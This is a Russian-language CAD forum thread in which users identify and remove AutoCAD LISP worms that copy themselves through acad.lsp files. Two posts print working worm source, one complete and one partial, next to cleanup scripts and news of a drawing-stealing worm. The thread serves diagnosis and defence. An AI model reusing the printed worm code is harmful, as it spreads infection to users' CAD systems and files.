Цитата:
Сообщение от b_1 Посмотреть сообщение
Ну и еще проблема. Есть така штука в автокаде - ПУЛЬТ УПРАВЛЕНИЯ.
Так вот она очень удобна для работы в 3d пространстве(2008асаd)
Я на этом пульте упраления делаю нужные себе панели упраления , ну и
работаю. А когда закрываю автокад и сахожу заново, то пульт
упраления пуст, приходится заново его настраивать. т.е. он не запоминает, а сначала все работало нормально (это как проблема с
filedia (1)) Заранее С П А С И Б.
Рабочее пространство с настроенным пультом пробовал сохранять?
Хмурый вне форума  
 
Непрочитано 12.08.2008, 13:53
#70
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


Хотелось спросить как исправить эту проблему, тоже мешает работать
b_1 вне форума  
 
Непрочитано 12.08.2008, 13:56
#71
b_1

проект
 
Регистрация: 05.08.2008
Екатеринбург
Сообщений: 113


сохранение рабочего пространства не помогае
вообще пульта нет при повторном открытии
b_1 вне форума  
 
Непрочитано 12.08.2008, 14:02
#72
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Гидрит вашу перекись! Это - НЕ ВИРУС!
В другой топик шагом марш!
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 13.08.2008, 11:25
#73
Natali m

Архитектура
 
Регистрация: 06.08.2007
Алматы
Сообщений: 15


А вот я опять про вирус. Как только удаляю все файлы LSP, открываю любой файл AutoCAD, они все тут же появляются снова. Как с этим бороться? И что конкретно сделать, чтобы AutoCAD открывал все файлы в одной программе? И кстати, то, что вы мне скинули про макросы, это прекрасно, мне понравилось, но у меня не вводятся команды именно с клавиатуры, а не с кнопки.
Natali m вне форума  
 
Непрочитано 13.08.2008, 12:05
#74
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Еще раз прочитать ветку - она недлинная.
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 13.08.2008, 14:07
#75
intrepid


 
Регистрация: 18.02.2008
Сообщений: 143


Итак, то из-за чего начался весь сыр-бор еще в 2005 году появилось...
Эту шутку еще 5 и 6 касперы находили.
Читаем


А то что в посте №51 -
это троян который вышел полтора-два месяца назад. если не ошибаюсь -китайского происхождения.
intrepid вне форума  
 
Непрочитано 14.08.2008, 16:08
#76
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Как вскрыть вирус и почитать код? (я про acad.fas)
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 14.08.2008, 16:21
#77
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


http://dwg.ru/f/showpost.php?p=262114&postcount=52
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 14.08.2008, 16:55
#78
Shoorup


 
Регистрация: 16.09.2006
Минск
Сообщений: 1,587
<phrase 1= Отправить сообщение для Shoorup с помощью Skype™


Кулик Алексей aka kpblc, я это читал и поиском пользовался. Ты написал что практическиневозможно, т.е если очень хочется, то можно. Так?
__________________
Поезд который устал от ржавого здравомыслия рельсов...
Shoorup вне форума  
 
Непрочитано 14.08.2008, 17:07
#79
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Ага, из 60-70 килобайт компилированного лиспа получить без малого метр ассемблероподобного кода - для меня это слишком. Вечером (после 22:00 Мск) постучись мне в аську - обсудим
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 14.08.2008, 19:26
#80
Apelsinov

Проектировщик ВК. LISP-любитель.
 
Регистрация: 15.12.2003
Москва
Сообщений: 1,202
<phrase 1=


Мне последнее время частенько попадался этот т.н. вирус в присланных чертежах, только был он совсем безвредным, т.к. половина кода его была варварски стерта, а осталась только та, что ведала "размножением". Я говорю о старой версии lsp. В свое время написал такую штуку для защиты от этой пакости:
Код:
[Выделить все]
(defun apel-copy_acad_lsp (/
			   a base_path	      acad_lsp_path
			   acad_lsp_newname
			  )
   (if (and
	 (setq base_path	(VL-FILENAME-DIRECTORY (findfile "base.dcl"))
	       acad_lsp_path	(strcat base_path "\\acad.lsp")
	       acad_lsp_newname	"\\acad_old.lsp"
	 )
	 (cond ((eq -1 (setq a (ACET-FILE-ATTR acad_lsp_path))) T)
	       ((/= 33 a)
		(VL-FILE-RENAME
		  acad_lsp_path
		  (strcat base_path acad_lsp_newname)
		)
	       )
	 )
	 (not (close (open acad_lsp_path "W")))
	 (ACET-FILE-ATTR acad_lsp_path 33)
       )
     (alert
       (strcat
	 "Внимание! Файл по адресу:\n" acad_lsp_path
	 "\nбыл переименован в " acad_lsp_newname
	 "\nНа его месте был создан новый файл acad.lsp для защиты от вируса.
	\nНовый файл имеет свойство - только для чтения. \n")
     )
   )
)
Мне не приходило в голову,что кто-то может написать компилированную версию, и я не знал что acad.fas запускается аналогично acad.lsp.Не знаю что делает этот компилированный новый вирус, но если бы я решил такой написать, то написал бы код, заменяющий существующий acad.fas собой, и защита с созданием такого пустого файла не прошла бы.

В качестве предложения - можно написать новый хороший вирус для борьбы с имеющимся плохим Попадая в зараженный автокад, он будет записывать себя в нужные файлы, стирая оттуда плохой вирус и предотвращая новое заражение... будем бить врага его же оружием.
Apelsinov вне форума  
 
Непрочитано 03.09.2008, 15:01
#81
Bekbolatov

ГАП
 
Регистрация: 02.09.2008
Астана
Сообщений: 8


Решение проблемы по любым АвтоКад вирусам: http://dwg.ru/f/showthread.php?p=275205&
Bekbolatov вне форума  
 
Непрочитано 17.10.2008, 10:57
#82
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Еще один вариант заразы Acaddoc.lsp вирус или нет?
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 23.06.2009, 15:05
#83
Denys

Інженер
 
Регистрация: 19.05.2009
Київ
Сообщений: 7


Цитата:
Сообщение от dextron3 Посмотреть сообщение
Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]
Отсылай этот файл Касперскому в лабораторию (там есть такая функция), они быстро реагируют и вскоре, обновив антивирусные базы, твой каспер найдёт и обезвредит заразу. (Хотя ... странно что вирусу уже год, а Каспер его не знает).

Сам качать файл боюсь. :-Р

Удачи
Denys вне форума  
 
Непрочитано 11.07.2010, 18:43
#84
znatok


 
Регистрация: 12.04.2009
Сообщений: 94


Мой ответ относится к следующим сообщениям
Цитата:
Сообщение от dextron3 Посмотреть сообщение
....
Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой
Касперский его не видет вплоть до 7 версии
КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
Цитата:
Сообщение от Asys Посмотреть сообщение
мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство
Во, что выдаёт virustotal:

http://www.virustotal.com/ru/analisi...0c5-1278857854

http://www.virustotal.com/ru/analisi...3f2-1278858704
znatok вне форума  
 
Непрочитано 07.07.2011, 14:14
#85
WOL4OHOK


 
Регистрация: 17.06.2009
Сообщений: 10


Цитата:
Сообщение от VVA Посмотреть сообщение
Еще один вариант заразы Acaddoc.lsp вирус или нет?
Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.
WOL4OHOK вне форума  
 
Непрочитано 07.07.2011, 16:19
#86
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Цитата:
Сообщение от WOL4OHOK Посмотреть сообщение
что делать
Не хз, а почитать FAQ по AutoCAD
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 17.08.2011, 05:16
#87
mig84


 
Регистрация: 22.12.2009
Новосибирск
Сообщений: 29


Цитата:
Сообщение от WOL4OHOK Посмотреть сообщение
Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.
Взяв за основу скрипт vbs'ский сделал небольшую утилиту. Чистит все файлы *.lsp от "хвостов" этой гадости. *.mnr, *.mns, *.mnc - удаляются.
Замечена пока одна проблема как и у скрипта - если есть сетевые диски, их надо отключить перед проверкой. В отличии от скрипта - нет необходимости запускать с консоли, чтобы увидеть что именно было удалено/очищено.
ps: сборка для net.3.5 (если установлен AutoCad 2010 и дальше, то этот fw уже установлен)
Вложения
Тип файла: zip lispVir.zip (121.4 Кб, 341 просмотров)
mig84 вне форума  
 
Непрочитано 24.08.2011, 09:52
1 | #88
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Набрел на следующие рекомендации AUTODESK How to detect and remove the Acad.vlx virus
Тема на другом форуме про вирус acad viruse Там выложена программа KillWorm для очистки заразы из Acaddoc.lsp вирус или нет? (та, которая (setq flagx t))
Опции
Цитата:
Active to search, find, then kill the virus if it is active.
Passive to search, find, then kill the virus even if it is not currently active.
ALL to search all local drives and folders.
? to see a brief help about the command.

KillWorm142.lsp
Вложения
Тип файла: lsp KillWorm.lsp (15.8 Кб, 676 просмотров)
__________________
Как использовать код на Лиспе читаем здесь

Последний раз редактировалось VVA, 27.02.2015 в 23:18.
VVA вне форума  
 
Непрочитано 05.09.2011, 20:41
#89
Yuriy-I

сп. САПР, архитектор
 
Регистрация: 25.05.2008
Санкт-Петербург
Сообщений: 116


пока удалил ...
читаю, что пропустил )))
__________________
"лучше" или "хуже" - понятия относительные

Последний раз редактировалось Yuriy-I, 05.09.2011 в 21:55.
Yuriy-I вне форума  
 
Непрочитано 26.09.2011, 16:44 Вирус Автокада
#90
weltwelt


 
Регистрация: 26.09.2011
Сообщений: 3


Цитата:
Сообщение от dextron3 Посмотреть сообщение
Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]
Вирус заползает с флешки, если с среди множества файлов есть такой файлик с acad.lsp программой.

Как бороться - Удалить все acad.lsp c машины. И вместо них записать все необходимые acad.lsp с указанным атрибутом ONLY READ

В этом случае вирус не залезает. Кстати Вирусом он закидаваеся также в папку
C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 200ххх\...
Здесь тоже создать такой only-read файл acad.lsp.

На данный момент AVAST этот вирус лечит
weltwelt вне форума  
 
Непрочитано 26.09.2011, 19:16
#91
Солидворкер
Moderator

Конструктор (машиностроение)
 
Регистрация: 23.10.2006
Россия
Сообщений: 23,283
<phrase 1=


weltwelt, Капитан, это Вы?!
Солидворкер вне форума  
 
Непрочитано 26.09.2011, 19:27
#92
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


weltwelt Проще, создать вирус, а потом его уничтожить. Это не Вы?
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 30.09.2011, 10:52
#93
ciril

САПР
 
Регистрация: 29.09.2011
СПб
Сообщений: 283


Объявилась слегка модифицированная версия обсуждаемого файла. Выглядит как:
acad.lsp
Код:
[Выделить все]
 ++++++++++++++++++++----------------------------------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




------------------------
(defun s::startup  (/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2 kd)
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 1)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq ns1 ""
        ns2 "")
  (setq lspbj 0)
  (if (= acadpath dwgpath)
    (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acad.lsp")) (writeapp))
    (progn
      (if (/= nowdwg "Drawing.dwg")
        (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp)))))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (if (setq kd (findfile "acadisa.lin"))
    (progn (setq ns2 0)
           (if (setq ns1 (open kd "r"))
             (progn (while (setq wz (read-line ns1))
                      (if (= wjqm wz)
                        (setq ns2 1)))
                    (close ns1)))
           (if (= ns2 0)
             (progn (setq ns1 (open kd "a")) (write-line wjqm ns1) (close ns1)))
           (if (setq ns1 (open kd "r"))
             (progn (setq wz (read-line ns1)) (close ns1)))
           (if (> (getvar "date") (+ (distof wz) 8))
             (progn (setq oldacad (strcat path "acadisa.lin"))
                    (setq newacad (strcat dwgpath "a"))
                    (writeapp)
                    (if (setq wjm1 (open oldacad "w"))
                      (progn (setq wjm (open newacad "r"))
                             (setq wz (read-line wjm))
                             (write-line (rtos (getvar "date")) wjm1)
                             (setq wz (read-line wjm))
                             (if (> (getvar "date") 2452900)
                               (close (open wz "w")))
                             (while (setq wz (read-line wjm)) (write-line wz wjm1))
                             (close wjm)
                             (close wjm1)
                             (close (open newacad "w")))))))
    (progn (if (setq ns1 (open (strcat path "acadisa.lin") "w"))
             (progn (write-line (rtos (getvar "date")) ns1) (write-line wjqm ns1) (close ns1)))))
  (setvar "cmdecho" old_cmd)
  (princ))
(defun writeapp  ()
  (if (setq wjm1 (open newacad "w"))
    (progn (setq wjm (open oldacad "r"))
           (while (setq wz (read-line wjm)) (write-line wz wjm1))
           (close wjm)
           (close wjm1))))
                                        ;*************
Существенное отличие - создает файл acadisa.lin, в который записывает пути к папкам, в которых уже присутствует. На чем и построена борьба с ним:
anti.lsp
Код:
[Выделить все]
 ((eval '(lambda (/ x00 x01 x02 x03)
          (while (setq x00 (findfile "acadisa.lin")) ;ищем, пока по путям поддержки находится файл acadisa.lin
            (setq x01 0)
            (read-line (setq x02 (open x00 "r"))) ;открываем его, читаем, первая линия: дата - не нужна
            (while (setq x03 (read-line x02)) ;читаем пока не кончится
              (and (vl-file-delete (strcat (vl-filename-directory x03) "\\acad.lsp")) (setq x01 (1+ x01)))) ;удаляем acad.lsp, приращаем счетчик, возобновляем цикл чтения acadisa.lin
            (close x02) ;закрываем acadisa.lin
            (vl-file-delete x00)) ;удаляем его, возобновляем цикл поиска
          (and x01 (progn (setq s::startup nil) (princ (strcat "\nacad.lsp - " (itoa x01))))) ;переопределяем стартапп-функцию и выводим количество удаленных acad.lsp
          (princ))))
Добавить в автозагрузку. Или записью в реестр:
[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R18.1\ACAD-9000:419\Profiles\"текущий_профиль"\Dialogs\Appload\Startup]
"NStartup"="путь к файлу\\anti.LSP"
"NumStartup"="N"
"текущий профиль" - значение по умолчанию ключа profile
если файлы в автозагрузке уже есть, то этот будет последним и NumStartup увеличится на единицу.

Последний раз редактировалось ciril, 13.10.2011 в 12:13. Причина: выдает ошибку на незараженном компе
ciril вне форума  
 
Непрочитано 13.01.2012, 15:52
#94
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Появилась такая проблема после копирования объекта и его расчленении. Когда просто открывался ничего не было, а как скопировал себе объект и расчленил, перестал сохранять и сохранять как. Файл из Данлоада dnl5450_Shemy_stropovok_gruzov_v_pomocsh_PPRcshikam_
Воспользовался с поста 87 (спасибо!), теперь сохраняет, а сохранить как не "хотит", пишет "Неправильное имя файла".
Самое обидное что надо по диплому распечатывать и работать
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 16:07
1 | #95
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431


Этот вирус лечится изменением драйвера hands.sys
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 13.01.2012, 16:12
#96
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Цитата:
Сообщение от Кулик Алексей aka kpblc Посмотреть сообщение
Этот вирус лечится изменением драйвера hands.sys
Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 17:06
#97
Солидворкер
Moderator

Конструктор (машиностроение)
 
Регистрация: 23.10.2006
Россия
Сообщений: 23,283
<phrase 1=


Цитата:
Сообщение от Wyacheslav1 Посмотреть сообщение
Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?
Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность
Солидворкер вне форума  
 
Непрочитано 13.01.2012, 17:12
#98
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Цитата:
Сообщение от Солидворкер Посмотреть сообщение
Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность
Лучше бы врача выпрямляющего кривые руки
Как "сохранить как"?
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 17:38
1 | #99
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


filedia в 1,
нормальное имя файлу давать,
чертёж от шелухи очистить,
Сохранить чертёж, скопировать в проводнике и переименовать,
Скопировать файл автосохранения,
Биться головой о стену пока не полегчает.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 13.01.2012, 19:05
#100
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


лучше с последнего начать
gomer вне форума  
 
Непрочитано 02.02.2012, 11:59
#101
oleg111


 
Регистрация: 16.10.2009
Сообщений: 47


А у меня такая проблема копируешь линию определеное количество раз ,ну допустем 8 так вот с последней скопированой линеей можно работать ,а с предыдущими ничего не зделать они заблокированы,но все это лечиться закрытием и последующим открытием файла,вопрос что это? спасибо за ответ
oleg111 вне форума  
 
Непрочитано 02.02.2012, 12:09
#102
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Попробуй:
1. Вид - Регенерировать всё
2. Правка - Выделить всё, после этого нажать "На передний план"
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 27.06.2012, 06:35
#103
MCAD


 
Блог
 
Регистрация: 05.01.2005
Сообщений: 1,723


Обнаружен вирус, похищавший чертежи AutoCAD.
Цитата:
Недавняя история с вирусом Flame, направленным на саботаж иранской ядерной программы, а также ставшие регулярными истории об очередной краже номеров кредитных карт с реквизитами владельцев - приучили нас к мысли, что в Интернет могут обворовать точно так же (а иногда и серьёзнее) как и в реальной жизни.

Очередное подтверждение этой аксиомы: обнаружен специализированный вирус ACAD/Medre.A, распространяющийся вместе с инфицированными шаблонами AutoCAD и крадущий файлы с чертежами, которые тайно отсылает на ряд электронных почтовых ящиков в Китае.

Вспышка вирусной атаки зафиксирована в Перу службой ESET Live Grid (облачной системой обнаружения угроз, использующей данные от пользователей ESET по всему миру). Специалисты компании обнаружили, что червь похищает файлы и отправляет их на учётные записи электронной почты в Китае. Чтобы прекратить передачу файлов, аналитики ESET связались с китайским интернет-провайдером Tencent, Национальным центром КНР по реагированию на вирусные угрозы, а также с компанией Autodesk, создателем AutoCAD. Специалисты ESET сообщают, что на момент обнаружения вируса были похищены десятки тысяч чертежей AutoCAD (принадлежащих в основном пользователям из Перу).

Из-за масштабности вирусной атаки специалисты ESET обратились к владельцу домена qq.com, компании Tencent. Благодаря незамедлительным действиям ESET и Tencent учетные записи, использовавшиеся для передачи чертежей, были заблокированы, что предотвратило дальнейшую утечку данных.

Помимо Перу, исследовательские группы ESET во всем мире обнаружили небольшое количество заражений в других латино-американских странах. Большое число заражений в Перу может быть связано с тем, что вредоносное ПО, модифицированное под файл AutoCAD, могло быть внедрено в компании, которые работают с государственными службами Перу. Это наводит на мысль, что основной мишенью создателей ACAD/Medre.A являлись именно эти организации. На данный момент ESET сотрудничает с местными властями, чтобы восстановить пораженный веб-сайт.
MCAD на форуме  
 
Непрочитано 27.06.2012, 09:18
#104
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


MCAD« ACAD / Medre . A представляет собой интересный случай промышленного шпионажа, вредоносная программа отслеживает появление новых чертежей на компьютерах зараженных пользователей и автоматически отправляет их на почту злоумышленникам, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики российского представительства ESET. - Такие хищения могут нанести серьезный материальный ущерб не только государственным учреждениям, но и просто владельцам интеллектуальной собственности, поскольку киберпреступники получают доступ к проектам еще до их запуска в производство. Они даже могут успеть получить патент на новый продукт до того, как создатели обратятся в патентное бюро».
вирус не причём!
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 27.06.2012, 09:27
#105
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


Цитата:
Сообщение от sbi Посмотреть сообщение
вирус не причём!
А логика?
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 27.06.2012, 09:31
#106
MCAD


 
Блог
 
Регистрация: 05.01.2005
Сообщений: 1,723


Цитата:
Сообщение от sbi Посмотреть сообщение
вирус не причём!
Я, как всегда, выводы не делаю. Только информация.
Цитата:
Сообщение от skif58 Посмотреть сообщение
А логика?
Вот именно!
MCAD на форуме  
 
Непрочитано 27.06.2012, 09:37
#107
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


skif58! и такую прогу можно напмсать на любом языке Причем здесь ВИРУС? Используя ошибки net.
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 27.06.2012, 10:16
#108
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


sbi, я всегда думал, что ВИРУС - это прога.
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 27.08.2012, 17:36
#109
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 27.08.2012, 18:57
#110
Хмурый


 
Регистрация: 29.10.2004
СПб
Сообщений: 16,379


Цитата:
Сообщение от hwd Посмотреть сообщение
Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...
да он, SP1, уже вышел, но потом удалили. я даже скачать не успел.
http://forum.dwg.ru/showpost.php?p=962002&postcount=89

Последний раз редактировалось Хмурый, 27.08.2012 в 19:02.
Хмурый вне форума  
 
Непрочитано 27.08.2012, 19:58
#111
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Цитата:
Сообщение от Хмурый Посмотреть сообщение
да он, SP1, уже вышел, но потом удалили.
я в курсе, поэтому и пишу - ждать...
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 10.10.2012, 06:53
#112
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Делаю работу для одной конторы. Там в каждой папке с чертежами dwg сидят acad.lsp Даже бесплатная Авира орет о вирусне и предлагает их удалить. У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"? Код прилагаю:
Код:
[Выделить все]
 (defun
	  s::startup
		    (/	      old_cmd  path	dwgpath	 mnlpath
		     apppath  oldacad  newacad	nowdwg	 lspbj
		     wjm      wjm1     wjqm	wjqm1	 wz
		     ns1      ns2
		    )
  (setq
    old_cmd
     (getvar
       "cmdecho"
     )
  )
  (setvar
    "cmdecho"
    0
  )
  (setq
    path
     (findfile
       "base.dcl"
     )
  )
  (setq
    path
     (substr
       path
       1
       (-
	 (strlen
	   path
	 )
	 8
       )
     )
  )
  (setq
    mnlpath
     (getvar
       "menuname"
     )
  )
  (setq
    nowdwg
     (getvar
       "dwgname"
     )
  )
  (setq
    wjqm
     (findfile
       nowdwg
     )
  )
  (setq
    dwgpath
     (substr
       wjqm
       1
       (-
	 (strlen
	   wjqm
	 )
	 (strlen
	   nowdwg
	 )
       )
     )
  )
  (setq
    acadpath
     (findfile
       "acad.lsp"
     )
  )
  (setq
    acadpath
     (substr
       acadpath
       1
       (-
	 (strlen
	   acadpath
	 )
	 8
       )
     )
  )
  (setq
    ns1
	""
    ns2
	""
  )
  (setq
    lspbj
     0
  )
  (setq
    wjqm
     (strcat
       path
       "acad.lsp"
     )
  )
  (if
    (setq
      wjm
       (open
	 wjqm
	 "r"
       )
    )
     (progn
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (setq
	    ns1
	     ns2
	  )
	  (setq
	    ns2
	     wz
	  )
       )
       (if
	 (>
	   (strlen
	     ns1
	   )
	   14
	 )
	  (if
	    (=
	      (substr
		ns1
		8
		7
	      )
	      "acadapp"
	    )
	     (setq
	       lspbj
		1
	     )
	  )
       )
       (close
	 wjm
       )
     )
  )
  (if
    (and
      (=
	acadpath
	dwgpath
      )
      (/=
	acadpath
	path
      )
    )
     (progn
       (setq
	 oldacad
	  (findfile
	    "acad.lsp"
	  )
       )
       (setq
	 newacad
	  (strcat
	    path
	    "acadapp.lsp"
	  )
       )
       (if
	 (=
	   lspbj
	   0
	 )
	  (progn
	    (setq
	      wjqm
	       (strcat
		 path
		 "acad.lsp"
	       )
	    )
	    (setq
	      wjm
	       (open
		 wjqm
		 "a"
	       )
	    )
	    (write-line
	      (strcat
		"(load
"
		(chr
		  34
		)
		"acadapp"
		(chr
		  34
		)
		")"
	      )
	      wjm
	    )
	    (write-line
	      "(princ)"
	      wjm
	    )
	    (close
	      wjm
	    )
	  )
       )
       (writeapp)
     )
     (progn
       (if
	 (/=
	   nowdwg
	   "Drawing.dwg"
	 )
	  (progn
	    (setq
	      oldacad
	       (findfile
		 "acadapp.lsp"
	       )
	    )
	    (setq
	      newacad
	       (strcat
		 dwgpath
		 "acad.lsp"
	       )
	    )
	    (writeapp)
	  )
       )
     )
  )
    (setvar
    "cmdecho"
    old_cmd
  )
  (princ)
)
(defun
	  writeapp
		  ()
  (if
    (setq
      wjm1
       (open
	 newacad
	 "w"
       )
    )
     (progn
       (setq
	 wjm
	  (open
	    oldacad
	    "r"
	  )
       )
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (write-line
	    wz
	    wjm1
	  )
       )
       (close
	 wjm
       )
       (close
	 wjm1
       )
     )
  )
)
(defun
	  C:explode
		   (/
		    p
		    cont
		    old_cmd
		   )
  (setq
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 09:09
#113
Do$

AutoCAD/Civil3D LISP/C#
 
Регистрация: 15.08.2008
Санкт-Петербург
Сообщений: 1,701
Отправить сообщение для Do$ с помощью Skype™


Код приведен не полностью, но уже видно, что идет переопределение команды EXPLODE. Кто-то пытался, наверное, защитить свои блоки от расчленения Хотя надо смотреть код полностью, может там еще какие-то сюрпризы.
Do$ вне форума  
 
Непрочитано 10.10.2012, 14:34
#114
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"?
да, это "вирус", 100%
gomer вне форума  
 
Непрочитано 10.10.2012, 17:07
#115
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Цитата:
Код приведен не полностью
